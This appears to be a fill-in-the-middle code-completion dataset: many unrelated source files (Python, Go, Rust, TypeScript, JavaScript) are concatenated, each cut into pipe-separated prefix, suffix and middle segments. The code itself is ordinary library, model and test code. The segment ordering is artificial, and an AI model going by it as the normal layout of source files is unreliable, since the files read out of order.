row(self.annotator_input, self.annotator_apply, self.annotator_export),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehImageSoftLabel(BokehSoftLabelExplorer, BokehForImage):
"""
???+ note "The image flavor of `BokehSoftLabelExplorer`.""
"""
TOOLTIP_KWARGS = BokehForImage.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForImage.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehSoftLabelExplorer.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(self.data_key_button_group),
row(self.score_filter),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehImageMargin(BokehMarginExplorer, BokehForImage):
"""
???+ note "The image flavor of `BokehMarginExplorer`.""
"""
TOOLTIP_KWARGS = BokehForImage.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForImage.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehMarginExplorer.SUBSET_GLYPH_KWARGS
class BokehImageSnorkel(BokehSnorkelExplorer, BokehForImage):
"""
???+ note "The image flavor of `BokehSnorkelExplorer`.""
"""
TOOLTIP_KWARGS = BokehForImage.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForImage.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehSnorkelExplorer.SUBSET_GLYPH_KWARGS
@deprecated(
version="0.4.0",
reason="will be removed in a future version; please use BokehTextFinder instead.",
)
class BokehCorpusExplorer(BokehTextFinder):
pass
@deprecated(
version="0.4.0",
reason="will be removed in a future version; please use BokehTextFinder instead.",
)
class BokehCorpusAnnotator(BokehTextAnnotator):
pass
| """
???+ note "The text flavor of `BokehSnorkelExplorer`.""
"""
TOOLTIP_KWARGS = BokehForText.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForText.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehSnorkelExplorer.SUBSET_GLYPH_KWARGS |
base.py | from __future__ import unicode_literals
import re
class CanonBase:
single_verse_re = {
'en': 'v[.]*',
'fr': '[v]{1,2}[.]?\s{0,2}',
}
def __init__(self, language='en'):
self.language = language
# We check for books
if hasattr(self, 'books'):
# If it is not a dictionary, we raise an error
if not isinstance(self.books, dict):
raise Exception('"books" should be a dictionary, who\'s values are four valued tuples (Book Name, '
'Abbreviation, Regex, [ch1_verse_count, ch2_verse_count, ...])')
# We set the regex instance variables
self.book_re_string = '|'.join(b.get(self.language)[2] for b in self.books.values())
self.book_re = re.compile(self.book_re_string, re.IGNORECASE | re.UNICODE)
| raise Exception('Text has no "books"') | self.single_verse_re_string = self.single_verse_re.get(self.language)
# Otherwise we raise an error
else: |
serviceDoc.js | import "../domainDoc.js"
/**
* @callback onDevelopersReadyCallback
* @param {Developer[]} devs - array of developers
* @return {undefined} void
*/
| /**
* @callback onProjectsReadyCallback
* @param {Project[]} projects - array of projects
* @return {undefined} void
*/
/**
* Common interface for all services (abstract factory pattern)
*
* @typedef {
{loadDevelopers: (function(onDevelopersReadyCallback): undefined)},
{loadProjects: (function(onProjectsReadyCallback): undefined)}
} PepService
*/ | |
lua_aerospike.go | // +build !app_engine
// Copyright 2013-2019 Aerospike, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package lua
import (
"github.com/Exotel-Org/aerospike-client-go/logger"
"github.com/yuin/gopher-lua"
)
type LuaAerospike struct {
s chan interface{}
}
const luaLuaAerospikeTypeName = "LuaAerospike"
// Registers my luaAerospike type to given L.
func | (L *lua.LState) {
mt := L.NewTypeMetatable(luaLuaAerospikeTypeName)
L.SetGlobal("aerospike", mt)
// static attributes
L.SetField(mt, "log", L.NewFunction(luaAerospikeLog))
L.SetMetatable(mt, mt)
}
func luaAerospikeLog(L *lua.LState) int {
if L.GetTop() < 2 || L.GetTop() > 3 {
L.ArgError(1, "2 arguments are expected for aerospike:log method")
return 0
}
// account for calling it on a table
paramIdx := 1
if L.GetTop() == 3 {
paramIdx = 2
}
level := L.CheckInt(paramIdx)
str := L.CheckString(paramIdx + 1)
switch level {
case 1:
logger.Logger.Warn(str)
case 2:
logger.Logger.Info(str)
case 3, 4:
logger.Logger.Debug(str)
}
return 0
}
| registerLuaAerospikeType |
compareplot.py | """Summary plot for model comparison."""
import numpy as np
import matplotlib.pyplot as plt
from .plot_utils import _scale_fig_size
def | (
comp_df,
insample_dev=True,
plot_standard_error=True,
plot_ic_diff=True,
order_by_rank=True,
figsize=None,
textsize=None,
plot_kwargs=None,
ax=None,
):
"""
Summary plot for model comparison.
This plot is in the style of the one used in the book Statistical Rethinking (Chapter 6)
by Richard McElreath.
Notes
-----
    Defaults to comparing the Widely Applicable Information Criterion (WAIC) if present in comp_df column,
otherwise compares Leave-one-out (loo)
Parameters
----------
comp_df : pd.DataFrame
Result of the `az.compare()` method
insample_dev : bool, optional
Plot in-sample deviance, that is the value of the information criteria without the
penalization given by the effective number of parameters (pIC). Defaults to True
plot_standard_error : bool, optional
Plot the standard error of the information criteria estimate. Defaults to True
plot_ic_diff : bool, optional
Plot standard error of the difference in information criteria between each model
and the top-ranked model. Defaults to True
order_by_rank : bool
If True (default) ensure the best model is used as reference.
figsize : tuple, optional
If None, size is (6, num of models) inches
textsize: float
Text size scaling factor for labels, titles and lines. If None it will be autoscaled based
on figsize.
plot_kwargs : dict, optional
Optional arguments for plot elements. Currently accepts 'color_ic',
'marker_ic', 'color_insample_dev', 'marker_insample_dev', 'color_dse',
'marker_dse', 'ls_min_ic' 'color_ls_min_ic', 'fontsize'
ax : axes, optional
Matplotlib axes
Returns
-------
ax : matplotlib axes
Examples
--------
Show default compare plot
.. plot::
:context: close-figs
>>> import arviz as az
>>> model_compare = az.compare({'Centered 8 schools': az.load_arviz_data('centered_eight'),
>>> 'Non-centered 8 schools': az.load_arviz_data('non_centered_eight')})
>>> az.plot_compare(model_compare)
Plot standard error and information criteria difference only
.. plot::
:context: close-figs
>>> az.plot_compare(model_compare, insample_dev=False)
"""
if figsize is None:
figsize = (6, len(comp_df))
figsize, ax_labelsize, _, xt_labelsize, linewidth, _ = _scale_fig_size(figsize, textsize, 1, 1)
if ax is None:
_, ax = plt.subplots(figsize=figsize, constrained_layout=True)
if plot_kwargs is None:
plot_kwargs = {}
yticks_pos, step = np.linspace(0, -1, (comp_df.shape[0] * 2) - 1, retstep=True)
yticks_pos[1::2] = yticks_pos[1::2] + step / 2
yticks_labels = [""] * len(yticks_pos)
_information_criterion = ["waic", "loo"]
column_index = [c.lower() for c in comp_df.columns]
for information_criterion in _information_criterion:
if information_criterion in column_index:
break
else:
raise ValueError(
"comp_df must contain one of the following"
" information criterion: {}".format(_information_criterion)
)
if order_by_rank:
comp_df.sort_values(by="rank", inplace=True)
if plot_ic_diff:
yticks_labels[0] = comp_df.index[0]
yticks_labels[2::2] = comp_df.index[1:]
ax.set_yticks(yticks_pos)
ax.errorbar(
x=comp_df[information_criterion].iloc[1:],
y=yticks_pos[1::2],
xerr=comp_df.dse[1:],
color=plot_kwargs.get("color_dse", "grey"),
fmt=plot_kwargs.get("marker_dse", "^"),
mew=linewidth,
elinewidth=linewidth,
)
else:
yticks_labels = comp_df.index
ax.set_yticks(yticks_pos[::2])
if plot_standard_error:
ax.errorbar(
x=comp_df[information_criterion],
y=yticks_pos[::2],
xerr=comp_df.se,
color=plot_kwargs.get("color_ic", "k"),
fmt=plot_kwargs.get("marker_ic", "o"),
mfc="None",
mew=linewidth,
lw=linewidth,
)
else:
ax.plot(
comp_df[information_criterion],
yticks_pos[::2],
color=plot_kwargs.get("color_ic", "k"),
marker=plot_kwargs.get("marker_ic", "o"),
mfc="None",
mew=linewidth,
lw=0,
)
if insample_dev:
ax.plot(
comp_df[information_criterion] - (2 * comp_df["p_" + information_criterion]),
yticks_pos[::2],
color=plot_kwargs.get("color_insample_dev", "k"),
marker=plot_kwargs.get("marker_insample_dev", "o"),
mew=linewidth,
lw=0,
)
ax.axvline(
comp_df[information_criterion].iloc[0],
ls=plot_kwargs.get("ls_min_ic", "--"),
color=plot_kwargs.get("color_ls_min_ic", "grey"),
lw=linewidth,
)
scale_col = information_criterion + "_scale"
if scale_col in comp_df:
scale = comp_df[scale_col].iloc[0].capitalize()
else:
scale = "Deviance"
ax.set_xlabel(scale, fontsize=ax_labelsize)
ax.set_yticklabels(yticks_labels)
ax.set_ylim(-1 + step, 0 - step)
ax.tick_params(labelsize=xt_labelsize)
return ax
| plot_compare |
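As a short, hedged usage sketch building on the docstring example above (model_compare is the DataFrame built there; the plot_kwargs keys are the ones listed in the parameter description):

# Sketch: customize the comparison plot via plot_kwargs.
ax = plot_compare(
    model_compare,
    insample_dev=False,
    plot_kwargs={"color_ic": "C0", "marker_ic": "s", "ls_min_ic": ":"},
)
ax.set_title("Model comparison")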
lib.rs | #![cfg_attr(all(not(feature = "std"), not(test)), no_std)]
#![doc(html_root_url = "https://docs.rs/helgoboss-midi/0.3.3")]
//! Interfaces, data structures and utilities for dealing with MIDI messages.
//!
//! # Features
//!
//! - Complete support for the following message types:
//! - Short messages (3 bytes)
//! - 14-bit Control Change messages
//! - (N)RPN messages
//! - Scanners for extracting 14-bit Control Change and (N)RPN messages from a stream of short
//! messages
//! - Suitable for real-time usage (no heap allocation, no dynamic dispatch, no locking)
//! - Unified API to work with different short message data structures (see
//! [`ShortMessage`](trait.ShortMessage.html) trait)
//! - Uses wording which is as close as possible to the [MIDI 1.0 specification](https://www.midi.org/specifications-old/category/midi-1-0-detailed-specifications)
//!
//! # Not yet implemented
//!
//! Data structures and utilities for dealing with System Exclusive messages are not yet
//! implemented. They will be added eventually as separate structures on top of the
//! existing ones (similar to (N)RPN and 14-bit Control Change).
//!
//! # Examples
//!
//! See how to ...
//!
//! - [Create and inspect short messages](struct.RawShortMessage.html#example)
//! - [Easily match short messages](enum.StructuredShortMessage.html#example)
//! - [Create and inspect 14-bit Control Change
//! messages](struct.ControlChange14BitMessage.html#example)
//! - [Create and inspect (N)RPN messages](struct.ParameterNumberMessage.html#example)
//! - [Create MIDI messages with minimum boilerplate](test_util/index.html#example)
//! - [Scan stream for 14-bit Control Change
//! messages](struct.ControlChange14BitMessageScanner.html#example)
//! - [Scan stream for (N)RPN messages](struct.ParameterNumberMessageScanner.html#example)
#[macro_use]
mod newtype_macros;
pub use newtype_macros::*;
mod short_message;
pub use short_message::*;
mod short_message_factory;
pub use short_message_factory::*;
| mod raw_short_message;
pub use raw_short_message::*;
mod control_change_14_bit_message;
pub use control_change_14_bit_message::*;
mod control_change_14_bit_message_scanner;
pub use control_change_14_bit_message_scanner::*;
mod parameter_number_message;
pub use parameter_number_message::*;
mod parameter_number_message_scanner;
pub use parameter_number_message_scanner::*;
#[cfg(feature = "std")]
mod polling_parameter_number_message_scanner;
#[cfg(feature = "std")]
pub use polling_parameter_number_message_scanner::*;
// I added the _mod suffix because of intellij-rust issue 4992
mod channel_mod;
pub use channel_mod::*;
mod key_number_mod;
pub use key_number_mod::*;
mod controller_number_mod;
pub use controller_number_mod::*;
mod u4_mod;
pub use u4_mod::*;
mod u7_mod;
pub use u7_mod::*;
mod u14_mod;
pub use u14_mod::*;
mod bit_util;
pub(crate) use bit_util::*;
pub mod test_util; | mod structured_short_message;
pub use structured_short_message::*;
|
WhiteSelect.tsx | import { Select, withStyles } from "@material-ui/core";
| paddingTop: "12px",
paddingBottom: "11px",
backgroundColor: "#FFFFFF",
"&:focus": {
backgroundColor: "#FFFFFF",
},
},
})(Select); | export const WhiteSelect = withStyles({
root: { |
test_moab_wrapper.py | from typing import Optional
import gym
import pytest
from ray.rllib.env.wrappers.moab_wrapper import _MoabBaseWrapper
from ray.tune.registry import ENV_CREATOR, _global_registry
@pytest.mark.parametrize("env_name, iterations",
[
("MoabMoveToCenterSim-v0", 10),
("MoabMoveToCenterPartialObservableSim-v0", 10),
("MoabMoveToCenterAvoidObstacleSim-v0", 3),],
)
@pytest.mark.parametrize("randomize_ball", [True, False])
@pytest.mark.parametrize("randomize_obstacle", [True, False])
@pytest.mark.parametrize("seed", [None, 1])
class TestMoabWrapper:
@pytest.fixture
def env_name(self) -> str:
return "MoabMoveToCenterSim-v0"
@pytest.fixture
def randomize_ball(self) -> bool:
return False
@pytest.fixture
def randomize_obstacle(self) -> bool:
return False
@pytest.fixture
def seed(self) -> Optional[int]:
return None
@pytest.fixture
def iterations(self) -> int:
return 3
@pytest.fixture
def moab_env(self,
env_name: str,
randomize_ball: bool,
randomize_obstacle: bool,
seed: Optional[int]) -> _MoabBaseWrapper:
env_creator = _global_registry.get(ENV_CREATOR, env_name)
env_config = {
"randomize_ball": randomize_ball,
"randomize_obstacle": randomize_obstacle,
"seed": seed,
}
return env_creator(env_config)
def test_observation_space(self, moab_env: _MoabBaseWrapper, iterations: int):
obs = moab_env.reset()
        assert moab_env.observation_space.contains(obs), \
            f"{moab_env.observation_space} doesn't contain {obs}"
new_obs, _, _, _ = moab_env.step(moab_env.action_space.sample())
assert moab_env.observation_space.contains(new_obs)
def test_action_space_conversion(self, moab_env: _MoabBaseWrapper, iterations: int):
assert isinstance(moab_env.action_space, gym.spaces.Box)
moab_env.reset()
action = moab_env.action_space.sample()
moab_env.step(action)
def test_few_iterations(self, moab_env: _MoabBaseWrapper, iterations: int):
moab_env.reset() | for _ in range(iterations):
moab_env.step(moab_env.action_space.sample()) |
|
test_sqlcreate.py | # -*- coding: utf-8 -*-
from io import StringIO
from django.core.management import CommandError, call_command
from django.test import TestCase
from django.test.utils import override_settings
from unittest.mock import patch
MYSQL_DATABASE_SETTINGS = {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'dbatabase',
'USER': 'foo',
'PASSWORD': 'bar',
'HOST': '127.0.0.1',
'PORT': '3306',
}
SQLITE3_DATABASE_SETTINGS = {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'db.sqlite3',
}
POSTGRESQL_DATABASE_SETTINGS = {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'database',
'USER': 'foo',
'PASSWORD': 'bar',
'HOST': 'localhost',
'PORT': '5432',
}
class SqlcreateExceptionsTests(TestCase):
"""Test for sqlcreate exception."""
def test_should_raise_CommandError_if_database_is_unknown(self):
with self.assertRaisesRegex(CommandError, "Unknown database unknown"):
call_command('sqlcreate', '--database=unknown')
class SqlCreateTests(TestCase):
"""Tests for sqlcreate command."""
@override_settings(DATABASES={'default': MYSQL_DATABASE_SETTINGS})
@patch('sys.stderr', new_callable=StringIO)
@patch('sys.stdout', new_callable=StringIO)
@patch('django_extensions.management.commands.sqlcreate.socket')
def test_should_print_SQL_create_database_statement_for_mysql(self, m_socket, m_stdout, m_stderr):
m_socket.gethostname.return_value = 'tumbleweed'
expected_error = """-- WARNING!: https://docs.djangoproject.com/en/dev/ref/databases/#collation-settings
-- Please read this carefully! Collation will be set to utf8_bin to have case-sensitive data.
"""
expected_statement = """CREATE DATABASE dbatabase CHARACTER SET utf8 COLLATE utf8_bin;
GRANT ALL PRIVILEGES ON dbatabase.* to 'foo'@'tumbleweed' identified by 'bar';
"""
call_command('sqlcreate')
self.assertEqual(expected_statement, m_stdout.getvalue())
self.assertEqual(expected_error, m_stderr.getvalue())
@override_settings(DATABASES={'default': POSTGRESQL_DATABASE_SETTINGS})
@patch('sys.stdout', new_callable=StringIO)
def test_should_print_SQL_create_database_statement_for_postgresql(self, m_stdout):
expected_statement = """CREATE USER foo WITH ENCRYPTED PASSWORD 'bar' CREATEDB;
CREATE DATABASE database WITH ENCODING 'UTF-8' OWNER "foo";
GRANT ALL PRIVILEGES ON DATABASE database TO foo;
"""
call_command('sqlcreate')
self.assertEqual(expected_statement, m_stdout.getvalue())
@override_settings(DATABASES={'default': POSTGRESQL_DATABASE_SETTINGS})
@patch('sys.stdout', new_callable=StringIO)
def test_should_print_SQL_drop_and_create_database_statement_for_postgresql(self, m_stdout):
expected_statement = """DROP DATABASE IF EXISTS database;
DROP USER IF EXISTS foo;
CREATE USER foo WITH ENCRYPTED PASSWORD 'bar' CREATEDB;
CREATE DATABASE database WITH ENCODING 'UTF-8' OWNER "foo";
GRANT ALL PRIVILEGES ON DATABASE database TO foo;
"""
call_command('sqlcreate', '--drop')
self.assertEqual(expected_statement, m_stdout.getvalue())
@override_settings(DATABASES={'default': SQLITE3_DATABASE_SETTINGS})
@patch('sys.stderr', new_callable=StringIO)
def test_should_print_stderr_for_sqlite3(self, m_stderr):
|
@override_settings(DATABASES={
'unknown': {
'ENGINE': 'django.db.backends.unknown',
'NAME': 'database',
'USER': 'foo',
}
})
@patch('sys.stderr', new_callable=StringIO)
@patch('sys.stdout', new_callable=StringIO)
def test_should_print_stderr_and_standard_create_database_statement_for_unsupported_engine(self, m_stdout, m_stderr):
expected_error = "-- Don't know how to handle 'unknown' falling back to SQL.\n"
expected_statement = """CREATE DATABASE database;
GRANT ALL PRIVILEGES ON DATABASE database to foo;
"""
call_command('sqlcreate', '--database=unknown')
self.assertEqual(expected_error, m_stderr.getvalue())
self.assertEqual(expected_statement, m_stdout.getvalue())
| expected_error = "-- manage.py syncdb will automatically create a sqlite3 database file.\n"
call_command('sqlcreate')
self.assertEqual(expected_error, m_stderr.getvalue()) |
handler.go | package client
import (
sdk "github.com/cosmos/cosmos-sdk/types"
sdkerrors "github.com/cosmos/cosmos-sdk/types/errors"
"github.com/cosmos/cosmos-sdk/x/evidence"
evidenceexported "github.com/cosmos/cosmos-sdk/x/evidence/exported"
"github.com/cosmos/cosmos-sdk/x/ibc/02-client/exported"
"github.com/cosmos/cosmos-sdk/x/ibc/02-client/types"
ibctmtypes "github.com/cosmos/cosmos-sdk/x/ibc/07-tendermint/types"
localhosttypes "github.com/cosmos/cosmos-sdk/x/ibc/09-localhost/types"
)
// HandleMsgCreateClient defines the sdk.Handler for MsgCreateClient
func HandleMsgCreateClient(ctx sdk.Context, k Keeper, msg exported.MsgCreateClient) (*sdk.Result, error) {
clientType := exported.ClientTypeFromString(msg.GetClientType())
var clientState exported.ClientState
switch clientType {
case exported.Tendermint:
tmMsg, ok := msg.(ibctmtypes.MsgCreateClient)
if !ok {
return nil, sdkerrors.Wrap(ErrInvalidClientType, "Msg is not a Tendermint CreateClient msg")
}
var err error
clientState, err = ibctmtypes.InitializeFromMsg(tmMsg)
if err != nil {
return nil, err
}
case exported.Localhost:
// msg client id is always "localhost"
clientState = localhosttypes.NewClientState(
k.ClientStore(ctx, msg.GetClientID()),
ctx.ChainID(),
ctx.BlockHeight(),
)
default:
return nil, sdkerrors.Wrap(ErrInvalidClientType, msg.GetClientType())
}
_, err := k.CreateClient(
ctx, clientState, msg.GetConsensusState(),
)
if err != nil {
return nil, err
}
ctx.EventManager().EmitEvents(sdk.Events{
sdk.NewEvent(
EventTypeCreateClient,
sdk.NewAttribute(AttributeKeyClientID, msg.GetClientID()),
sdk.NewAttribute(AttrbuteKeyClientType, msg.GetClientType()),
),
sdk.NewEvent(
sdk.EventTypeMessage,
sdk.NewAttribute(sdk.AttributeKeyModule, AttributeValueCategory),
),
})
return &sdk.Result{
Events: ctx.EventManager().Events().ToABCIEvents(),
}, nil
}
// HandleMsgUpdateClient defines the sdk.Handler for MsgUpdateClient
func | (ctx sdk.Context, k Keeper, msg exported.MsgUpdateClient) (*sdk.Result, error) {
_, err := k.UpdateClient(ctx, msg.GetClientID(), msg.GetHeader())
if err != nil {
return nil, err
}
return &sdk.Result{
Events: ctx.EventManager().Events().ToABCIEvents(),
}, nil
}
// HandlerClientMisbehaviour defines the Evidence module handler for submitting a
// light client misbehaviour.
func HandlerClientMisbehaviour(k Keeper) evidence.Handler {
return func(ctx sdk.Context, evidence evidenceexported.Evidence) error {
misbehaviour, ok := evidence.(exported.Misbehaviour)
if !ok {
return types.ErrInvalidEvidence
}
return k.CheckMisbehaviourAndUpdateState(ctx, misbehaviour)
}
}
| HandleMsgUpdateClient |
git.rs | use std::process::Command;
use std::str;
use std::vec::IntoIter;
pub fn list_branches(directory: Option<&String>) -> IntoIter<String> {
let output = Command::new("git")
.current_dir(directory.unwrap())
.arg("branch")
.arg("--format=%(refname:short)")
.output()
.expect("failed to execute process");
let lines = output.stdout
.iter()
.map(|&c| c as char)
.collect::<String>();
let debug: Vec<String> = lines
.split("\n")
.map(|c| c.trim())
.filter(|&c| c != "")
.map(|c| c.to_string())
.collect();
debug.into_iter()
}
pub fn delete_branch(directory: Option<&String>, branch: Option<&str>) | {
println!("Directory is {} and branch is {}", directory.unwrap(), branch.unwrap());
let output = Command::new("git")
.current_dir(directory.unwrap())
.arg("branch")
.arg("-D")
.arg(branch.unwrap())
.output()
.expect("failed to execute process");
println!("{:?}", output.stdout.iter().map(|&c| c as char).collect::<String>());
println!("{:?}", output.stderr.iter().map(|&c| c as char).collect::<String>());
} |
|
BillDingBizOrderSum.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class BillDingBizOrderSum(object):
def __init__(self):
self._biz_date = None
self._expenses = None
self._income = None
@property
def biz_date(self):
return self._biz_date
@biz_date.setter
def biz_date(self, value):
self._biz_date = value
@property
def expenses(self):
return self._expenses
@expenses.setter
def expenses(self, value):
self._expenses = value
@property
def income(self):
return self._income
@income.setter
def income(self, value):
self._income = value
def to_alipay_dict(self):
params = dict()
if self.biz_date:
if hasattr(self.biz_date, 'to_alipay_dict'):
params['biz_date'] = self.biz_date.to_alipay_dict()
else:
params['biz_date'] = self.biz_date
if self.expenses:
if hasattr(self.expenses, 'to_alipay_dict'):
params['expenses'] = self.expenses.to_alipay_dict()
else:
params['expenses'] = self.expenses
if self.income:
if hasattr(self.income, 'to_alipay_dict'):
params['income'] = self.income.to_alipay_dict()
else:
params['income'] = self.income
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = BillDingBizOrderSum()
if 'biz_date' in d:
o.biz_date = d['biz_date']
if 'expenses' in d:
o.expenses = d['expenses']
if 'income' in d:
|
return o
| o.income = d['income'] |
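A brief usage sketch of the model above (the sample values are invented): from_alipay_dict builds an instance from a plain dict and to_alipay_dict serializes it back.

# Usage sketch with made-up sample values.
raw = {'biz_date': '2021-06-01', 'expenses': '12.50', 'income': '99.00'}
order_sum = BillDingBizOrderSum.from_alipay_dict(raw)
assert order_sum.biz_date == '2021-06-01'
print(order_sum.to_alipay_dict())
# -> {'biz_date': '2021-06-01', 'expenses': '12.50', 'income': '99.00'}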
styles.ts | import styled from 'styled-components';
interface ProgressProps {
total: number;
current: number;
}
export const Container = styled.main`
width: 100%;
margin: 0 auto;
padding: 30px;
> header {
display: flex;
justify-content: space-between;
align-items: center;
margin-bottom: 15px;
}
`;
export const ProgressBar = styled.div<ProgressProps>`
height: 20px;
width: 100%;
border-radius: 4px;
background: #999;
position: relative;
display: flex;
align-items: center;
justify-content: center;
span {
font-size: 13px;
line-height: 21px;
z-index: 5;
color: #fff;
font-weight: bold;
}
&::before {
content: '';
width: ${props => (props.current * 100) / props.total}%;
max-width: 100%;
height: 100%;
border-radius: 4px;
position: absolute;
left: 0;
top: 0;
background: #ff79c6; | }
`; |
|
model_show_load_balancer_response.go | /*
* ELB
*
* No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
*
*/
package model
import (
"encoding/json"
"strings"
)
// Response Object
type ShowLoadBalancerResponse struct {
	// Request ID. Note: automatically generated.
RequestId *string `json:"request_id,omitempty"`
Loadbalancer *LoadBalancer `json:"loadbalancer,omitempty"`
}
func (o ShowLoadBalancerResponse) String() string {
data, _ := json.Marshal(o)
return strings.Join([]string{"ShowLoadBalancerResponse", string(data)}, " ") | } |
|
list.py | from django.shortcuts import render
def get_list(req):
return render(req, 'kwue/food.html', {})
def add_item(req):
|
def create_list(req):
return render(req, 'kwue/food.html', {})
| return render(req, 'kwue/food.html', {}) |
lib.rs | extern crate proc_macro;
use proc_macro::TokenStream;
use proc_macro2::Span;
use quote::quote;
use quote::ToTokens;
use syn::parse_macro_input;
use syn::visit_mut::VisitMut;
use syn::{spanned::Spanned, Arm, Error, ExprMatch, Ident, Item, ItemFn, Pat, Path, Result};
fn check_enum(ast: &Item) -> Result<()> {
match ast {
Item::Enum(enum_ast) => {
let mut prev = None;
for v in enum_ast.variants.iter() {
if let Some(ident_prev) = prev {
if &v.ident < ident_prev {
// re-iter the variants to find the proper location
for var in enum_ast.variants.iter() {
if var.ident > v.ident {
let error = Error::new(
v.ident.span(),
format!("{} should sort before {}", v.ident, var.ident),
);
return Err(error);
}
}
}
}
prev = Some(&v.ident);
}
Ok(())
}
_ => Err(Error::new(
Span::call_site(),
"expected enum or match expression",
)),
}
}
fn | <'a, Iter: Iterator<Item = &'a Pat> + Clone>(pat_iter: Iter) -> Result<()> {
let mut path_prev = None;
let mut ident_prev = None;
for pat in pat_iter.clone() {
if let Some(prev) = path_prev {
let cur_path = check_and_get_pat_path(pat)?;
if gt(prev, cur_path) {
for p in pat_iter.clone() {
let path = check_and_get_pat_path(p)?;
if gt(path, cur_path) {
return Err(Error::new(
cur_path.span(),
format!(
"{} should sort before {}",
fmt_path(cur_path),
fmt_path(path)
),
));
}
}
}
path_prev = Some(cur_path);
ident_prev = None;
} else if let Some(prev) = ident_prev {
let ident = check_and_get_pat_ident(pat)?;
if prev > ident {
return Err(Error::new(
ident.span(),
format!("{} should sort before {}", ident, prev),
));
}
ident_prev = Some(ident);
path_prev = None;
} else {
assert!(ident_prev.is_none() && path_prev.is_none());
if let Pat::Ident(i) = pat {
ident_prev = Some(&i.ident);
} else {
let path = check_and_get_pat_path(pat)?;
match path.get_ident() {
Some(i) => ident_prev = Some(i),
None => path_prev = Some(path),
}
}
}
}
Ok(())
}
fn fmt_path(p: &Path) -> String {
p.to_token_stream().to_string().replace(" ", "")
}
fn gt(p1: &Path, p2: &Path) -> bool {
for (s1, s2) in p1.segments.iter().zip(p2.segments.iter()) {
if s1.ident > s2.ident {
return true;
}
}
p1.segments.len() > p2.segments.len()
}
fn check_and_get_pat_path(pat: &Pat) -> Result<&Path> {
match pat {
Pat::Path(p) => Ok(&p.path),
Pat::Or(o) => {
check_pat_match(o.cases.iter())?;
check_and_get_pat_path(o.cases.first().unwrap())
}
Pat::Reference(r) => check_and_get_pat_path(r.pat.as_ref()),
Pat::Struct(s) => Ok(&s.path),
Pat::TupleStruct(t) => Ok(&t.path),
pat => Err(Error::new(
pat.span().unwrap().into(),
"unsupported by #[sorted]",
)),
}
}
fn check_and_get_pat_ident(pat: &Pat) -> Result<&Ident> {
match pat {
Pat::Ident(i) => Ok(&i.ident),
p => {
let path = check_and_get_pat_path(p)?;
match path.get_ident() {
Some(i) => Ok(i),
None => unimplemented!(),
}
}
}
}
fn check_pat(mut arms: &[Arm]) -> Result<()> {
if !arms.is_empty() {
let len = arms.len();
if let Pat::Wild(_) = arms[len - 1].pat {
arms = &arms[..len - 1];
}
check_pat_match(arms.iter().map(|a| &a.pat))
} else {
Ok(())
}
}
struct CheckVisitor {
result: Result<()>,
}
impl CheckVisitor {
fn new() -> Self {
CheckVisitor { result: Ok(()) }
}
}
impl VisitMut for CheckVisitor {
fn visit_expr_match_mut(&mut self, i: &mut ExprMatch) {
let check_idx = i
.attrs
.iter()
.enumerate()
.filter_map(|(idx, attr)| {
if attr.path.segments.len() == 1
&& attr.path.segments.first().unwrap().ident == "sorted"
{
Some(idx)
} else {
None
}
})
.next();
if let Some(idx) = check_idx {
i.attrs.remove(idx);
self.result = check_pat(&i.arms);
}
}
}
#[proc_macro_attribute]
pub fn sorted(args: TokenStream, input: TokenStream) -> TokenStream {
let _ = args;
let ast = parse_macro_input!(input as Item);
let error = match check_enum(&ast) {
Err(e) => Some(e.to_compile_error()),
_ => None,
};
(quote! {
#ast
#error
})
.into()
}
#[proc_macro_attribute]
pub fn check(args: TokenStream, input: TokenStream) -> TokenStream {
let _ = args;
let mut ast = parse_macro_input!(input as ItemFn);
let mut visitor = CheckVisitor::new();
visitor.visit_item_fn_mut(&mut ast);
let error = match visitor.result {
Err(e) => Some(e.to_compile_error()),
_ => None,
};
(quote! {
#ast
#error
})
.into()
}
| check_pat_match |
test_fan.py | """Tests for the Bond fan device."""
from datetime import timedelta
from typing import Optional
from bond_api import Action, DeviceType, Direction
from homeassistant import core
from homeassistant.components import fan
from homeassistant.components.fan import (
ATTR_DIRECTION,
ATTR_SPEED_LIST,
DIRECTION_FORWARD,
DIRECTION_REVERSE,
DOMAIN as FAN_DOMAIN,
SERVICE_SET_DIRECTION,
)
from homeassistant.const import ATTR_ENTITY_ID, SERVICE_TURN_OFF, SERVICE_TURN_ON
from homeassistant.helpers.entity_registry import EntityRegistry
from homeassistant.util import utcnow
from .common import patch_bond_action, patch_bond_device_state, setup_platform
from tests.common import async_fire_time_changed
def ceiling_fan(name: str):
"""Create a ceiling fan with given name."""
return {
"name": name,
"type": DeviceType.CEILING_FAN,
"actions": ["SetSpeed", "SetDirection"],
}
async def turn_fan_on(
hass: core.HomeAssistant, fan_id: str, speed: Optional[str] = None
) -> None:
"""Turn the fan on at the specified speed."""
service_data = {ATTR_ENTITY_ID: fan_id}
if speed:
service_data[fan.ATTR_SPEED] = speed
await hass.services.async_call(
FAN_DOMAIN, SERVICE_TURN_ON, service_data=service_data, blocking=True,
)
await hass.async_block_till_done()
async def test_entity_registry(hass: core.HomeAssistant):
"""Tests that the devices are registered in the entity registry."""
await setup_platform(hass, FAN_DOMAIN, ceiling_fan("name-1"))
